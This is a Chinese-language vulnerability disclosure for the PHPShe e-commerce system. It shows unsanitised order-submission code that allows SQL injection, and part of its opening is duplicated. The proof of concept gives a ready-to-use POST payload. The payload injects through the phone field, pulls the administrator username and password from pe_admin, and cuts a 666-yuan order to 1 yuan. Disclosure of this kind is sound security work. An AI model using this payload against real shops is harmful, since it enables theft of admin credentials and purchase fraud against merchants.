### 简要描述: ~~~ ### 详细说明: 很早之前就发现了,到现在还没修~~~ PHPSHE商城系统,在用户提交订单时,收获信息多处存在SQL注入,有回显,可直接获取管理员账户信息。 module/index/order.php文件: ``` //#####################@ 订单增加 @#####################// case 'add': $cart_info = cart_info(unserialize($_c_cart_list)); $info_list = $cart_info['list']; $money = $cart_info['money']; if (isset($_p_pesubmit)) { //!count($info_list) && pe_error('购物车商品为空'); $order = $db->pe_select('order', array('order by'=>'order_id desc')); substr($order['order_id'], 0 , 6) != date('ymd') && $_p_info['order_id'] = $order_id = date('ymd').'0001'; $_p_info['order_productmoney'] = $money['order_productmoney']; $_p_info['order_wlmoney'] = $money['order_wlmoney']; $_p_info['order_money'] = $money['order_money']; $_p_info['order_atime'] = time(); $_p_info['user_id'] = $_s_user_id; $_p_info['user_name'] = $_s_user_name; $_p_info['user_address'] = "{$_p_province}{$_p_city}{$_p_info['user_address']}"; if ($order_id = $db->pe_insert('order', $_p_info)) { foreach ($info_list as $v) {...
### 简要描述: ~~~ ### 详细说明: 很早之前就发现了,到现在还没修~~~ PHPSHE商城系统,在用户提交订单时,收获信息多处存在SQL注入,有回显,可直接获取管理员账户信息。 module/index/order.php文件: ``` //#####################@ 订单增加 @#####################// case 'add': $cart_info = cart_info(unserialize($_c_cart_list)); $info_list = $cart_info['list']; $money = $cart_info['money']; if (isset($_p_pesubmit)) { //!count($info_list) && pe_error('购物车商品为空'); $order = $db->pe_select('order', array('order by'=>'order_id desc')); substr($order['order_id'], 0 , 6) != date('ymd') && $_p_info['order_id'] = $order_id = date('ymd').'0001'; $_p_info['order_productmoney'] = $money['order_productmoney']; $_p_info['order_wlmoney'] = $money['order_wlmoney']; $_p_info['order_money'] = $money['order_money']; $_p_info['order_atime'] = time(); $_p_info['user_id'] = $_s_user_id; $_p_info['user_name'] = $_s_user_name; $_p_info['user_address'] = "{$_p_province}{$_p_city}{$_p_info['user_address']}"; if ($order_id = $db->pe_insert('order', $_p_info)) { foreach ($info_list as $v) { $orderdata['product_id'] = $v['product_id']; $orderdata['product_name'] = $v['product_name']; $orderdata['product_smoney'] = $v['product_smoney']; $orderdata['product_num'] = $v['product_num']; $orderdata['order_id'] = $order_id; $db->pe_insert('orderdata', $orderdata); //更新商品库存数量 $db->pe_update('product', array('product_id'=>$v['product_id']), "`product_num`=`product_num`-{$v['product_num']}"); } //清空购物车 if (pe_login('user')) { $db->pe_delete('cart', array('user_id'=>$_s_user_id)); } else { setcookie('cart_list', '', 0, '/'); } pe_success('订单提交成功,请选择支付方式!', "{$pe['host_root']}index.php?mod=order&act=pay&id={$order_id}"); } else { pe_error('订单提交失败...'); } } //调用用户个人信息里的收货地址 $info = $db->pe_select('user', array('user_id'=>$_s_user_id)); $seo = pe_seo('填写收货信息'); include(pe_tpl('order_add.html')); break; ``` 这里提交的POST数据进入了函数pe_insert ``` public function pe_insert($table, $set) { //处理设置语句 $sqlset = $this->_doset($set); return $this->sql_insert("insert into `".dbpre."{$table}` {$sqlset}"); } ......... //处理设置语句 protected function _doset($set) { if (is_array($set)) { foreach ($set as $k => $v) { $set_arr[] = "`{$k}` = '{$v}'"; } $sqlset = 'set '.implode($set_arr, ' , '); } else { $sqlset = "set {$set}"; } return $sqlset; } ......... public function sql_insert($sql) { $this->query($sql); if ($insert_id = mysql_insert_id()) { return $insert_id; } else { $result = mysql_affected_rows(); return $result > 0 ? $result : 0; } } ......... public function query($sql) { $this->sql[] = $sql; return mysql_query($sql, $this->dbconn); } ``` 到最后进入SQL语句时也没有进行过滤处理,导致sql注入 这里的参数user_addres,user_tname,user_phone,user_tel,order_text等都存在注入。 这里的注入存在回显,造成的危害: 1、不仅可以注入出管理员账户信息等; 2、还可以任意修改商品金额,任意金额购物。 ### 漏洞证明: 第一步,普通用户登陆后,加入任意商品到购物车。 第二步,然后提交订单。 第三步,截包,修改如下。 发送请求: 链接:localhost/phpshe/index.php?mod=order&act=cartadd&product_id=1&product_num=1 POST:province=%E6%B2%B3%E5%8D%97%E7%9C%81&city=%E9%83%91%E5%B7%9E%E5%B8%82&info[user_address]=123123123&info[user_tname]=%E9%98%BF%E6%96%AF%E9%A1%BF%E9%A3%9E&info[user_phone]=13111111111&info[user_tel]=88888888' ,`order_text`=(SELECT concat(admin_name,0x23,admin_pw) FROM `pe_admin` limit 0,1), `order_productmoney` = '1' , `order_wlmoney` = '1' , `order_money` = '1' , `order_atime` = '1395119678' , `user_id` = '1' , `user_name` = '111111'#&info[order_text]=111111&pesubmit= [<img src="https://images.seebug.org/upload/201405/07133422149d9d3e195c54931fee5d7bf85988b4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/07133422149d9d3e195c54931fee5d7bf85988b4.png) 注意这里的金额应该是666元 [<img src="https://images.seebug.org/upload/201405/0713343217aab15c944657d39b37c915ff3b3329.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/0713343217aab15c944657d39b37c915ff3b3329.png) 发送请求后,订单成功提交了。 来看看提交后的订单详情: [<img src="https://images.seebug.org/upload/201405/071334423e0441d38b5ee489a07a63e6ab933c2a.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/071334423e0441d38b5ee489a07a63e6ab933c2a.png) 成功注入出管理员的用户名密码,以及原本666元的订单,现在只需要支付1元。
